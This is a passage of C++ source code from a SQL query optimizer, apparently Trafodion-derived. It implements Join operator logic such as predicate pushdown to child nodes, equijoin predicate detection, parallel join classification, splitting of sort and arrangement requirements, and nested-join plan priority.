ensure correctness // in evaluating the predicates pushed down to it. The same predicate // must be re-evaluated at this JOIN node. 
// --------------------------------------------------------------------- if (NOT inputsTakenOut.isEmpty()) { ValueIdSet moreJoinPredsThatStay; joinPred().lookForVEGPredicates(moreJoinPredsThatStay); moreJoinPredsThatStay.removeUnReferencedVEGPreds(inputsTakenOut); joinPredsThatStay += moreJoinPredsThatStay; } // --------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPredsThatStay, exprOnParent); //---------------------------------------------------------------------- // Solution 10-030728-8252: check if the second child could produce // expressions of type Instnull(CAST(aggregate)). // See if the CAST could be pushed // up. The Groupby node does not manufacture expressions of the type // cast(aggregate) as outputs in the generator. So do not ask for them //---------------------------------------------------------------------- exprOnParent.replaceInstnullCastAggregateWithAggregateInLeftJoins(this); // --------------------------------------------------------------------- // STEP 2B: Perform pushdown to the second child, and add reqd preds // back to the join predicates after the push down. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, availableInputs, joinPred(), &exprOnParent, 1); // --------------------------------------------------------------------- // Add back those predicates which must stay with the JOIN even after // they are pushed to the second child. 
// --------------------------------------------------------------------- joinPred() += VEGEqPreds2; joinPred() += joinPredsThatStay; } else { // STEP 1: Gather all values the children must still produce even if // predicates are pushed down. // // Find all the "true join VEGPreds" in predicates. E.g, VEGPred(VEG{ // T1.a,T2.a}) will be pushed down to Scan T1 and to Scan T2 even if // not both values are availble at either node. Therefore, we still // need to keep a copy of this type of predicates here at this Join node // where both T1.a and T2.a will be available. That means the children // need to provide these values to the Join node. The only exception is // when we are doing a TSJ. The predicates are then all pushed to the // right child, and the right child could then *not* provide the value // to the Join node if it's not a required output from the Join. // --------------------------------------------------------------------- ValueIdSet VEGEqPreds; predicates1.lookForVEGPredicates(VEGEqPreds); // --------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after // it's pushed down to Scan T1. // --------------------------------------------------------------------- VEGEqPreds.removeCoveredExprs(newExternalInputs); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. 
// --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild0) VEGEqPreds.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at second child. For // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3) // is not covered at the second child. The predicate could be pushed // down to the first child without being retained at JOIN2. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild1) VEGEqPreds.removeUnCoveredExprs( child(1).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Since these predicates will be retained at the Join (or pushed down // to the second child in the case of a TSJ), make sure the first // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds, exprOnParent); // --------------------------------------------------------------------- // STEP 2: Try pushing down to the first child. // --------------------------------------------------------------------- if (child(0).getPtr()->getOperator().match(REL_ANY_SEMIJOIN) || child(0).getPtr()->getOperator().match(REL_ANY_TSJ)) { computeValuesReqdForPredicates(predicates1, exprOnParent1); ValueIdSet emptySet; RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, emptySet, &exprOnParent1, 0); } else { RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicates1, &exprOnParent, 0); } // --------------------------------------------------------------------- // Find subset of predicatesOnParent which have *not* been pushed down // to first child. 
// --------------------------------------------------------------------- predicatesOnParent.intersectSet(predicates1); // --------------------------------------------------------------------- // STEP 3: Try pushing to second child now. // --------------------------------------------------------------------- if (child(1).getPtr()->getOperator().match(REL_ANY_SEMIJOIN) || (child(1).getPtr()->getOperator().match(REL_ANY_TSJ) && (child(1).getPtr()->getOperator() != REL_ROUTINE_JOIN))) { computeValuesReqdForPredicates(predicates2, exprOnParent2); ValueIdSet emptySet; RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, emptySet, &exprOnParent2, 1); } else { // We do not want to push predicates to the right child of a // routineJoin. if (!isRoutineJoin()) { RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicates2, &exprOnParent, 1); } } // --------------------------------------------------------------------- // Find subset of predicatesOnParent which have *not* been pushed down // to second child. // --------------------------------------------------------------------- predicatesOnParent.intersectSet(predicates2); // ------------------------------------------------------------------- // If this is a inner-join that is not a TSJ we need to add all the // true join VEGPreds back to selection predicates. // ------------------------------------------------------------------- predicatesOnParent += VEGEqPreds; } } // Join::pushdownCoveredExprSQO void Join::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); switch (getOperatorType()) { case REL_JOIN: case REL_MERGE_JOIN: case REL_NESTED_JOIN: case REL_HASH_JOIN: case REL_HYBRID_HASH_JOIN: case REL_ORDERED_HASH_JOIN: case REL_INDEX_JOIN: case REL_ROUTINE_JOIN: case REL_TSJ: { // Potentially, all the values that are produced by // my left child as well as my right child. 
outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); outputValues += child(1).getGroupAttr()->getCharacteristicOutputs(); break; } case REL_LEFT_JOIN: case REL_LEFT_NESTED_JOIN: case REL_LEFT_MERGE_JOIN: case REL_LEFT_ORDERED_HASH_JOIN: case REL_LEFT_HYBRID_HASH_JOIN: case REL_LEFT_TSJ: { // Potentially, all the values that are produced by // my left child and all null instantiated values from // my right child. outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); outputValues.insertList(nullInstantiatedOutput()); break; } case REL_FULL_JOIN: case REL_UNION_JOIN: case REL_FULL_HYBRID_HASH_JOIN: { // Potentially, all the values that are produced by // my left child and the right child. Since it's a FULL_OUTER_JOIN // all null instantiated values from my right and left child. outputValues.insertList(nullInstantiatedOutput()); outputValues.insertList(nullInstantiatedForRightJoinOutput()); break; } case REL_SEMIJOIN: case REL_ANTI_SEMIJOIN: case REL_SEMITSJ: case REL_ANTI_SEMITSJ: case REL_HASH_SEMIJOIN: case REL_HASH_ANTI_SEMIJOIN: case REL_MERGE_SEMIJOIN: case REL_MERGE_ANTI_SEMIJOIN: case REL_HYBRID_HASH_SEMIJOIN: case REL_HYBRID_HASH_ANTI_SEMIJOIN: case REL_ORDERED_HASH_SEMIJOIN: case REL_ORDERED_HASH_ANTI_SEMIJOIN: case REL_NESTED_SEMIJOIN: case REL_NESTED_ANTI_SEMIJOIN: { // No value from my right child can appear in my output. outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); break; } case REL_TSJ_FLOW: case REL_NESTED_JOIN_FLOW: { // No value from my left child can appear in my output. 
outputValues += child(1).getGroupAttr()->getCharacteristicOutputs(); break; } default: { ABORT("Unsupported join type in Join::getPotentialOutputValues()"); break; } } // switch } // Join::getPotentialOutputValues() CostScalar Join::computeMinEstRCForGroup() { CostScalar minCard = csOne; GroupAttributes * ga = getGroupAttr(); RelExpr * logExpr = ga->getLogExprForSynthesis(); if (logExpr != NULL) { logExpr->finishSynthEstLogProp(); minCard = ga->getMinChildEstRowCount(); } return minCard; } // get the highest reduction from local predicates for cols of this join CostScalar Join::highestReductionForCols(ValueIdSet colSet) { // if the child is anything other than scan, then we assume the reduction to be 1 // but before that we still need to see if the column set that we are looking for // belongs to this child or not. // since we don't know to which child tableOne belongs, we shall look at both left // and right histograms for the columns. Start with the left child ColStatDescList completeList = child(0).outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->colStats(); ColStatDescList rightColStatList = child(1).outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->colStats(); // form a complete list of histograms from both sides completeList.makeDeepCopy(rightColStatList); // Compute reduction for this column set CostScalar highestUecRedByLocalPreds = highestUecRedByLocalPreds = completeList.getHighestUecReductionByLocalPreds(colSet); return highestUecRedByLocalPreds; } const NAString Join::getText() const { NAString result; switch (getOperatorType()) { case REL_JOIN: result += "join"; break; case REL_LEFT_JOIN: result += "left_join"; break; case REL_RIGHT_JOIN: result += "right_join"; break; case REL_FULL_JOIN: result += "full_join"; break; case REL_UNION_JOIN: result += "union_join"; break; case REL_ROUTINE_JOIN: result += "routine_join"; break; case REL_TSJ: result += "tsj"; break; case REL_TSJ_FLOW: result += "tsj_flow"; break; case REL_LEFT_TSJ: result += "left_tsj"; break; 
case REL_SEMIJOIN: result += "semi_join"; break; case REL_ANTI_SEMIJOIN: result += "anti_semi_join"; break; case REL_SEMITSJ: result += "semi_tsj"; break; case REL_ANTI_SEMITSJ: result += "anti_semi_tsj"; break; case REL_INDEX_JOIN: result += "index_join"; break; default: result += "UNKNOWN??"; break; } // switch if(CmpCommon::getDefault(COMP_BOOL_183) == DF_ON) { Int32 potential = getPotential(); if(potential < 0) { result += "_-"+ istring(-1*potential); } else result += "_" + istring(potential); } return result; } // Join::getText() HashValue Join::topHash() { HashValue result = RelExpr::topHash(); result ^= joinPred_; return result; } NABoolean Join::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; Join &o = (Join &) other; if (joinPred_ != o.joinPred_) return FALSE; // Temp member to seperate joins PTRule from others in cascades memo if (joinFromPTRule_ != o.joinFromPTRule_) return FALSE; if (joinForZigZag_ != o.joinForZigZag_) return FALSE; if (avoidHalloweenR2_ != o.avoidHalloweenR2_) return FALSE; if (halloweenForceSort_ != o.halloweenForceSort_) return FALSE; return TRUE; } RelExpr * Intersect::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) { result = new (outHeap) Intersect(NULL, NULL ); } else result = derivedNode; return RelExpr::copyTopNode(result, outHeap); } RelExpr * Except::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) { result = new (outHeap) Except(NULL, NULL ); } else result = derivedNode; return RelExpr::copyTopNode(result, outHeap); } RelExpr * Join::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Join *result; if (derivedNode == NULL) result = new (outHeap) Join(NULL, NULL, getOperatorType(), NULL, FALSE, FALSE, outHeap); else result = (Join *) derivedNode; // copy join predicate parse tree (parser only) if (joinPredTree_ != NULL) result->joinPredTree_ = 
joinPredTree_->copyTree(outHeap)->castToItemExpr(); result->joinPred_ = joinPred_; // Copy the uniqueness flags result->leftHasUniqueMatches_ = leftHasUniqueMatches_; result->rightHasUniqueMatches_ = rightHasUniqueMatches_; // Copy the equijoin predicates result->equiJoinPredicates_ = equiJoinPredicates_; result->equiJoinExpressions_ = equiJoinExpressions_; result->nullInstantiatedOutput() = nullInstantiatedOutput(); result->nullInstantiatedForRightJoinOutput() = nullInstantiatedForRightJoinOutput(); result->transformComplete_ = transformComplete_; // Copy the required order, if any, that originated from an insert node result->reqdOrder_ = reqdOrder_; // copy flag that marks a mandatory TSJ which could not be unnested result->tsjAfterSQO_ = tsjAfterSQO_; // Copy the flag that indicates if this is a TSJ for a write operation result->tsjForWrite_ = tsjForWrite_; result->tsjForUndo_ = tsjForUndo_; result->tsjForSetNFError_ = tsjForSetNFError_; result->tsjForMerge_ = tsjForMerge_; result->tsjForMergeWithInsert_ = tsjForMergeWithInsert_; result->tsjForMergeUpsert_ = tsjForMergeUpsert_; result->tsjForSideTreeInsert_ = tsjForSideTreeInsert_; result->enableTransformToSTI_ = enableTransformToSTI_; result->forcePhysicalJoinType_ = forcePhysicalJoinType_; result->derivedFromRoutineJoin_ = derivedFromRoutineJoin_; // Temp member to seperate joins PTRule from others in cascades memo result->joinFromPTRule_ = joinFromPTRule_; result->joinForZigZag_ = joinForZigZag_; result->sourceType_ = sourceType_; result->rowsetRowCountArraySize_ = rowsetRowCountArraySize_; result->avoidHalloweenR2_ = avoidHalloweenR2_; result->halloweenForceSort_ = halloweenForceSort_; result->candidateForSubqueryUnnest_ = candidateForSubqueryUnnest_; result->candidateForSubqueryLeftJoinConversion_ = candidateForSubqueryLeftJoinConversion_; result->candidateForSemiJoinTransform_ = candidateForSemiJoinTransform_; result->predicatesToBeRemoved_ = predicatesToBeRemoved_; //++MV result->rightChildMapForLeftJoin_ 
= rightChildMapForLeftJoin_; //--MV result->isIndexJoin_ = isIndexJoin_; if(!result->isInnerNonSemiJoin()) result->floatingJoin_ = floatingJoin_; result->allowPushDown_ = allowPushDown_; result->extraHubNonEssentialOutputs_ = extraHubNonEssentialOutputs_; result->isForTrafLoadPrep_ = isForTrafLoadPrep_; result->beforeJoinPredOnOuterOnly_ = beforeJoinPredOnOuterOnly_; return RelExpr::copyTopNode(result, outHeap); } void Join::addJoinPredTree(ItemExpr *joinPred) { ExprValueId j = joinPredTree_; ItemExprTreeAsList(&j, ITM_AND).insert(joinPred); joinPredTree_ = j.getPtr(); } ItemExpr * Join::removeJoinPredTree() { ItemExpr * result = joinPredTree_; joinPredTree_ = NULL; return result; } void Join::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (joinPredTree_ != NULL OR NOT joinPred_.isEmpty()) { if (joinPred_.isEmpty()) xlist.insert(joinPredTree_); else xlist.insert(joinPred_.rebuildExprTree()); llist.insert("other_join_predicates"); } RelExpr::addLocalExpr(xlist,llist); } void Join::convertToTsj() { switch (getOperatorType()) { case REL_JOIN: setOperatorType(REL_TSJ); break; case REL_LEFT_JOIN: setOperatorType(REL_LEFT_TSJ); break; case REL_SEMIJOIN: setOperatorType(REL_SEMITSJ); break; case REL_ANTI_SEMIJOIN: setOperatorType(REL_ANTI_SEMITSJ); break; default: ABORT("Internal error: Join::convertTsj()"); break; } } // Join::convertToTsj() void Join::convertToNotTsj() { switch (getOperatorType()) { case REL_TSJ: case REL_TSJ_FLOW: case REL_ROUTINE_JOIN: setOperatorType(REL_JOIN); break; case REL_LEFT_TSJ: setOperatorType(REL_LEFT_JOIN); break; case REL_SEMITSJ: setOperatorType(REL_SEMIJOIN); break; case REL_ANTI_SEMITSJ: setOperatorType(REL_ANTI_SEMIJOIN); break; default: ABORT("Internal error: Join::convertTsj()"); break; } } // Join::convertToNotTsj() void Join::convertToNotOuterJoin() { switch (getOperatorType()) { case REL_LEFT_JOIN: setOperatorType(REL_JOIN); break; case REL_LEFT_TSJ: setOperatorType(REL_TSJ); break; default: 
ABORT("Internal error: Join::convertOuterJoin()"); break; } // end switch } // Join::convertToNotOuterJoin() // ---------------------------------------------------------------------------- // This procedure gets called when synthesising logical properties. // It finds all the equijoin predicates and saves them in equiJoinPredicates_ // But leaves them in the originating selectionPred()/joinPred() // --------------------------------------------------------------------------- void Join::findEquiJoinPredicates() { ValueIdSet allJoinPredicates; ValueId leftExprId, rightExprId; NABoolean predicateIsOrderPreserving; ItemExpr* expr; equiJoinPredicates_.clear(); equiJoinExpressions_.clear(); // If this is a TSJ there is nothing to analyze. All join predicates // have been pushed down to the second child. if(isTSJ()) return; if (isInnerNonSemiJoin()) { allJoinPredicates = selectionPred(); CMPASSERT(joinPred().isEmpty()); } else { // for an outer or semi join, the ON clause is stored in "joinPred" // while the WHERE clause is stored in "selectionPred". allJoinPredicates = joinPred(); } // remove any predicates covered by the inputs allJoinPredicates.removeCoveredExprs(getGroupAttr()-> getCharacteristicInputs()); for (ValueId exprId = allJoinPredicates.init(); allJoinPredicates.next(exprId); allJoinPredicates.advance(exprId)) { expr = exprId.getItemExpr(); if (expr->isAnEquiJoinPredicate(child(0).getGroupAttr(), child(1).getGroupAttr(), getGroupAttr(), leftExprId, rightExprId, predicateIsOrderPreserving)) { equiJoinPredicates_ += exprId; equiJoinExpressions_.addMapEntry(leftExprId, rightExprId); } } } // Join::findEquiJoinPredicates() // --------------------------------------------------------------------------- // separateEquiAndNonEquiJoinPredicates is called from the Join // implementation rules to weed out of equiJoinPredicates_ all // the predicates that can be used by the join. 
The equiJoin // predicates for the physical operator will be remove from // the selectioPred() or joinPred() where they came from. // --------------------------------------------------------------------------- void Join::separateEquiAndNonEquiJoinPredicates (const NABoolean joinStrategyIsOrderSensitive) { ValueId leftExprId, rightExprId; NABoolean predicateIsOrderPreserving; ItemExpr* expr; // equiJoinPredicates_ has all the equijoin predicates found // when synthesing logical properties. It is a subset of // either selectionPred() or joinPred() ValueIdSet foundEquiJoinPredicates = equiJoinPredicates_; equiJoinPredicates_.clear(); equiJoinExpressions_.clear(); // remove any predicates covered by the inputs foundEquiJoinPredicates.removeCoveredExprs(getGroupAttr()-> getCharacteristicInputs()); for (ValueId exprId = foundEquiJoinPredicates.init(); foundEquiJoinPredicates.next(exprId); foundEquiJoinPredicates.advance(exprId)) { expr = exprId.getItemExpr(); if (expr->isAnEquiJoinPredicate(child(0).getGroupAttr(), child(1).getGroupAttr(), getGroupAttr(), leftExprId, rightExprId, predicateIsOrderPreserving)) { if ( (NOT joinStrategyIsOrderSensitive) OR (joinStrategyIsOrderSensitive AND predicateIsOrderPreserving) ) { equiJoinPredicates_ += exprId; equiJoinExpressions_.addMapEntry(leftExprId, rightExprId); } } else { CMPASSERT(0); // We knew it was an equijoin predicate already } } if (isInnerNonSemiJoin()) { selectionPred() -= equiJoinPredicates_; CMPASSERT(joinPred().isEmpty()); } else { // for an outer or semi join, the ON clause is stored in "joinPred" // while the WHERE clause is stored in "selectionPred". 
joinPred() -= equiJoinPredicates_; } // Since we have changed the set of equijoin predicates we will consider // we should resyhtnesize the left/rightHasUnqiueMatches_ flags synthConstraints(NULL); } // Join::separateEquiAndNonEquiJoinPredicates() void Join::flipChildren() { NABoolean flipUnique; flipUnique = leftHasUniqueMatches_; leftHasUniqueMatches_ = rightHasUniqueMatches_; rightHasUniqueMatches_ = flipUnique; equiJoinExpressions_.flipSides(); } // Join::flipChildren() // --------------------------------------------------------------------------- // get the parallel join type and return additional info (optional) // // 0: serial join // 1: TYPE1 join (matching partitions on both sides, including SkewBuster) // 2: TYPE2 join (join one partition on one side with the // entire table on the other side) // --------------------------------------------------------------------------- Int32 Join::getParallelJoinType(ParallelJoinTypeDetail *optionalDetail) const { Int32 result = 0; ParallelJoinTypeDetail detailedType = Join::PAR_NONE; const PartitioningFunction *mpf = NULL; const PartitioningFunction *cpf = NULL; if (getPhysicalProperty()) mpf = getPhysicalProperty()->getPartitioningFunction(); if (mpf == NULL OR mpf->getCountOfPartitions() <= 1) { // no parallelism or unknown parallelism, not a parallel join if (optionalDetail) *optionalDetail = detailedType; return 0; } if (child(1)->getPhysicalProperty()) cpf = child(1)->getPhysicalProperty()->getPartitioningFunction(); CMPASSERT( cpf ); if (cpf->castToLogPhysPartitioningFunction()) { // only the child of a join in DP2 can have a logphys part func DCMPASSERT(getPhysicalProperty()->executeInDP2()); cpf = cpf->castToLogPhysPartitioningFunction()-> getPhysPartitioningFunction(); } if (cpf->isAReplicateViaBroadcastPartitioningFunction() OR cpf->isAReplicateNoBroadcastPartitioningFunction()) { // Right child replicates, now check my own partitioning // function to see whether this node just passes on the // replication 
function. if (mpf->castToLogPhysPartitioningFunction()) { // only a join in DP2 can have a logphys part func DCMPASSERT(getPhysicalProperty()->executeInDP2()); // check the physical part. func of the join in DP2 mpf = mpf->castToLogPhysPartitioningFunction()-> getPhysPartitioningFunction(); } if (NOT mpf->isAReplicateViaBroadcastPartitioningFunction() AND NOT mpf->isAReplicateNoBroadcastPartitioningFunction()) { // See if the right child REALLY replicates data. If this is // a nested join and the chosen plan was a "preferred probing // order" plan, then this is really a type 1 join, because a // ppo plan always demands the two tables be logically // partitioned the same way. if (isNestedJoin() && ((NestedJoin*)this)->probesInOrder()) { result = 1; detailedType = PAR_OCR; } else { // right child replicates data, and the node itself doesn't, // this is a type 2 join result = 2; if (isNestedJoin()) detailedType = PAR_N2J; } } else { // Both the right child and the parent replicate data. // This is not a parallel join, it is a join that simply // passes its replication requirement down to both of its // children. The join will be executed in multiple ESPs, // but it will not employ one of the two parallel algorithms // (TYPE1 or TYPE2). 
result = 0; } } else { // right child is partitioned, but does not replicate, parallel type 1 join or SkewBuster or OCB PartitioningFunction *opf = NULL; if (child(0)->getPhysicalProperty()) opf = child(0)->getPhysicalProperty()->getPartitioningFunction(); if (opf->isAReplicateViaBroadcastPartitioningFunction()) { // this is an OCB join, which is considered type2 result = 2; detailedType = PAR_OCB; } else { // the regular TYPE1 join (including SkewBuster) result = 1; if (opf->isASkewedDataPartitioningFunction()) detailedType = PAR_SB; } } if (optionalDetail) *optionalDetail = detailedType; return result; } // --------------------------------------------------------------------- // Method to split the order req between the two join children. // return FALSE if not possible // --------------------------------------------------------------------- NABoolean Join::splitOrderReq( const ValueIdList& myOrderReq, /*IN*/ ValueIdList& orderReqOfChild0, /*OUT*/ ValueIdList& orderReqOfChild1 /*OUT*/) const { NABoolean partOfChild0List = TRUE; ValueId exprId; GroupAttributes* child0GA = child(0).getGroupAttr(); GroupAttributes* child1GA = child(1).getGroupAttr(); orderReqOfChild0.clear(); orderReqOfChild1.clear(); for (CollIndex ix = 0; ix < myOrderReq.entries(); ix++) { exprId = myOrderReq.at(ix); // dummy variables for the cover test ValueIdSet newInputs,referencedInputs, coveredSubExpr,uncoveredExpr; NABoolean coveredByChild0 = child0GA->covers(exprId, newInputs, referencedInputs, &coveredSubExpr, &uncoveredExpr); if (NOT coveredByChild0) partOfChild0List = FALSE; if (partOfChild0List) orderReqOfChild0.insertAt(orderReqOfChild0.entries(),exprId); else // i.e. NOT partOfChild0List { //++MV // For left join we need to translate the required sort key to // the right child outputs because there is an InstantiateNull function // on all of the right child outputs. 
The InstantiateNull function will // cause the cover test to fail and therefore the optimization that merge // the left child sort key with the right child sort key will fail // For more information see NestedJoin::synthPhysicalProperty() if (isLeftJoin()) { const ValueIdMap &map = rightChildMapForLeftJoin(); ValueId tempExprId = exprId; map.mapValueIdDown(tempExprId, exprId); } //--MV coveredSubExpr.clear(); uncoveredExpr.clear(); NABoolean coveredByChild1 = child1GA->covers(exprId, newInputs, referencedInputs, &coveredSubExpr, &uncoveredExpr); if (coveredByChild1) { orderReqOfChild1.insertAt(orderReqOfChild1.entries(),exprId); } else // i.e NOT (partOfChild0List || coveredByChild1) { orderReqOfChild0.clear(); orderReqOfChild1.clear(); return FALSE; } } } // end for all expressions in the required order // Check to see if it is possible to split the order if (child0GA->isUnique(orderReqOfChild0) OR (child0GA->getMaxNumOfRows() <= 1) OR (orderReqOfChild1.entries() == 0)) { return TRUE; } else { orderReqOfChild0.clear(); orderReqOfChild1.clear(); return FALSE; } } // end splitOrderReq() // --------------------------------------------------------------------- // method to split the arrangement req between the two join childs. 
// return FALSE if not possible
//
// Unlike splitOrderReq, arrangements are unordered: each element is billed
// to child 0 when covered there, otherwise to child 1; an element covered
// by neither child alone makes the split fail.
// ---------------------------------------------------------------------
NABoolean Join::splitArrangementReq(
     const ValueIdSet& myArrangReq,   /*IN*/
     ValueIdSet& ArrangReqOfChild0,   /*OUT*/
     ValueIdSet& ArrangReqOfChild1    /*OUT*/) const
{
  ArrangReqOfChild0.clear();
  ArrangReqOfChild1.clear();

  ValueId exprId;
  GroupAttributes* child0GA = child(0).getGroupAttr();
  GroupAttributes* child1GA = child(1).getGroupAttr();

  for (exprId = myArrangReq.init();
       myArrangReq.next(exprId);
       myArrangReq.advance(exprId))
  {
    // dummy variables for the cover test
    ValueIdSet newInputs,referencedInputs,
               coveredSubExpr,uncoveredExpr;

    // First we see if this element is covered by child 0
    if (child0GA->covers(exprId,
                         newInputs,
                         referencedInputs,
                         &coveredSubExpr,
                         &uncoveredExpr))
    {
      ArrangReqOfChild0.insert(exprId);
    }
    // Only if an element is not covered by Child0 then we check
    // Child1. i.e. if it is covered by both we bill it to Child0.
    else
    {
      coveredSubExpr.clear();
      uncoveredExpr.clear();
      if (child1GA->covers(exprId,
                           newInputs,
                           referencedInputs,
                           &coveredSubExpr,
                           &uncoveredExpr))
      {
        ArrangReqOfChild1.insert(exprId);
      }
      else
      {
        // If the expression was not covered solely by one of the children, then
        // we must give up. For example, "T1.a * T2.a" needs both children.
        ArrangReqOfChild0.clear();
        ArrangReqOfChild1.clear();
        return FALSE;
      }
    } // end if not covered by child0
  } // end for all expressions in the required arrangement

  // Check to see if it is possible to split the arrangement
  if (child0GA->isUnique(ArrangReqOfChild0) OR
      (child0GA->getMaxNumOfRows() <= 1) OR
      (ArrangReqOfChild1.entries() == 0))
  {
    return TRUE;
  }
  else
  {
    ArrangReqOfChild0.clear();
    ArrangReqOfChild1.clear();
    return FALSE;
  }
} // end splitArrangementReq()

// TRUE for the join types that own VEGRegions: left joins, anti-semi
// joins and full outer joins.
NABoolean Join::ownsVEGRegions() const
{
  return isLeftJoin() OR isAntiSemiJoin() OR isFullOuterJoin();
}

// Compute the PlanPriority for a nested join plan. Builds a risk-premium
// multiplier: 1.0 for plans judged safe (small/constrained outer row
// count), riskPremiumNJ() otherwise, further scaled by riskPremiumSerial()
// for serial plans; also adjusts priority levels for parallelism and for
// the SAP "prefer key nested join" heuristic (see below).
PlanPriority NestedJoin::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty();
  Lng32 degreeOfParallelism = spp->getCountOfPartitions();
  NABoolean applySerialPremium = TRUE;

  double val;
  Cardinality minrows, maxrows;
  CostScalar expectedrows =
    child(0).getGroupAttr()->getResultCardinalityForEmptyInput();

  if (child(0).getGroupAttr()->hasCardConstraint(minrows, maxrows) &&
      (maxrows <= ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_99) OR
       CostScalar(maxrows) < CostScalar(1.2) * expectedrows))
  {
    // a nested join with at most N outer rows is NOT risky
    val = 1.0;

    // In this case premium for serial plan can be waived because cost of
    // starting ESPs outweighs any benefit we get from parallel plan.
    // Fix is controlled by COMP_BOOL_75, default value is ON.
    if (CmpCommon::getDefault(COMP_BOOL_75) == DF_ON)
      applySerialPremium = FALSE;
  }
  else if (context->getInputLogProp() &&
           context->getInputLogProp()->getResultCardinality().value() > 1)
  {
    // temporary workaround until we cost HJ under NJ correctly
    val = 1.0;
  }
  else
  {
    // a nested join with more than N outer rows is considered risky
    val = CURRSTMT_OPTDEFAULTS->riskPremiumNJ();

    // nested join cache should have a lower risk premium
    GroupAttributes &rightGA = *child(1).getGroupAttr();
    NABoolean probeIsUnique = rightGA.isUnique(rightGA.getCharacteristicInputs());
    NABoolean isTypeOfSemiJoin = isSemiJoin() || isAntiSemiJoin();

    // same eligibility conditions as for the nested join probing cache
    if ((probeIsUnique || isTypeOfSemiJoin) &&
        (rowsFromRightHaveUniqueMatch() == FALSE) &&
        (getOperatorType() != REL_NESTED_JOIN_FLOW) &&
        (isTSJForWrite() == FALSE ) &&
        (getGroupAttr()-> isEmbeddedUpdateOrDelete() == FALSE ) &&
        (!spp->executeInDP2()) &&
        (CmpCommon::getDefault(NESTED_JOIN_CACHE) != DF_OFF))
    {
      double red=ActiveSchemaDB()->getDefaults().getAsDouble(COMP_INT_89);
      if (red > 1)
      {
        // reduce risk premium because it's a nested join cache operator
        val = 1 + (val - 1) / red;
      }
    }
  }

  if (degreeOfParallelism <= 1 && applySerialPremium)
  {
    // serial plans are risky. exact an insurance premium from serial plans.
    val *= CURRSTMT_OPTDEFAULTS->riskPremiumSerial();
  }

  CostScalar premium(val);
  PlanPriority result(0, 0, premium);

  // esp parallelism priority logic below does not apply to operators in dp2
  if(spp->executeInDP2())
    return result;

  // For the option of Max Degree of Parallelism we can either use the
  // value set in comp_int_9 (if positive) or we use the number of CPUs
  // if the CQD is set to -1, or feature is disabled if CQD is 0 (default).
  Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) )
  {
    // if CQD is set to -1 this means use the number of CPUs
    maxDegree = spp->getCurrentCountOfCPUs();
  }
  if (maxDegree > 1)  // CQD set to 0 means feature is OFF
  {
    if (degreeOfParallelism < maxDegree)
      result.incrementLevels(0,-10); // need to replace with constant
  }

  // fix for SAP case 10-100602-2913, soln 10-100602-0803
  // long-running select for DSO activation, query plan for empty table
  // if nested join has
  // 1) a tuple list (something with 0 base tables) on left, and
  // 2) a table on right, and
  // 3) prefer_key_nested_join is set, and
  // 4) table's predicate (including pushed join pred) forms begin/end
  //    key on table, and
  // 5) tuple list is of reasonable size (<= tuplelist_size_threshold),
  //    and
  // 6) table is small or has no stats
  // then give nested join plan higher priority
  // push it by 1 if it has a key range predicate
  // push it by 2 if it has a unique key predicate

  // is prefer_key_nested_join active?
  NABoolean prefer_key_nested_join =
    (CmpCommon::getDefault(SAP_PREFER_KEY_NESTED_JOIN) == DF_ON);

  if (prefer_key_nested_join)
  {
    GroupAttributes *grpAttr0 = child(0).getGroupAttr();
    GroupAttributes *grpAttr1 = child(1).getGroupAttr();
    GroupAnalysis *grpA0 = grpAttr0->getGroupAnalysis();
    GroupAnalysis *grpA1 = grpAttr1->getGroupAnalysis();

    // is left child guaranteed small?
    NABoolean leftIsSmall = FALSE;
    Cardinality minLeft, maxLeft;
    if (grpAttr0->hasCardConstraint(minLeft,maxLeft) AND
        maxLeft <= ActiveSchemaDB()->getDefaults().getAsLong
        (SAP_TUPLELIST_SIZE_THRESHOLD))
    {
      leftIsSmall = TRUE;
    }

    // is right a single table?
    FileScan *rScan = NULL;
    NABoolean rightIsTable = pws->getScanLeaf(1, planNumber, rScan);

    // is right table small?
    NABoolean isSmallTable =
      grpAttr1->getResultCardinalityForEmptyInput() <=
      ActiveSchemaDB()->getDefaults().getAsLong
      (SAP_KEY_NJ_TABLE_SIZE_THRESHOLD);

